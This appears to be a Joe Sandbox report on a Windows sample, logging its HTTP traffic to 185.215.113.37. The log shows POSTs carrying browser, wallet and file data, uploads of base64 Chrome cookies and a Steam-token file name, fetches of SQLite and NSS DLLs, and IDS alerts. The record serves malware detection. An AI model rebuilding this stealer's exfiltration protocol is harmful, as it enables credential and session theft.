Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBKHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="message"browsers------AFBKKFBAEGDHJJJJKFBK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKKEGDBFIIEBFHIEHCHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 2d 2d 0d 0a Data Ascii: ------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="message"plugins------JEBKKEGDBFIIEBFHIEHC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJKJJKEBGHJKFIDGCHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="message"fplugins------FCGIJKJJKEBGHJKFIDGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBAFIDAECAKFHJDBAFHost: 185.215.113.37Content-Length: 7907Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJKJJKEBGHJKFIDGCHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAAHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------HJDBAFIECGHCBFIDGDAAContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------HJDBAFIECGHCBFIDGDAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HJDBAFIECGHCBFIDGDAAContent-Disposition: form-data; name="file"------HJDBAFIECGHCBFIDGDAA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGDGCGDAKEBFIJECGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 47 2d 2d 0d 0a Data Ascii: ------AKKEGDGCGDAKEBFIJECGContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------AKKEGDGCGDAKEBFIJECGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AKKEGDGCGDAKEBFIJECGContent-Disposition: form-data; name="file"------AKKEGDGCGDAKEBFIJECG--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAFHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 2d 2d 0d 0a Data Ascii: ------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="message"wallets------FIJJKECFCFBGDHIECAAF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 2d 2d 0d 0a Data Ascii: ------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="message"files------EGDGDHJJDGHCAAAKEHIJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file"------IIJEBFCFIJJJEBGDBAKE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBFBFIIJDAKECAKKJEHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------EBFBFBFIIJDAKECAKKJEContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------EBFBFBFIIJDAKECAKKJEContent-Disposition: form-data; name="message"ybncbhylepme------EBFBFBFIIJDAKECAKKJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDBAKKKFBGDHJKFHJJJJ--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.37:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005E4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_005E4880

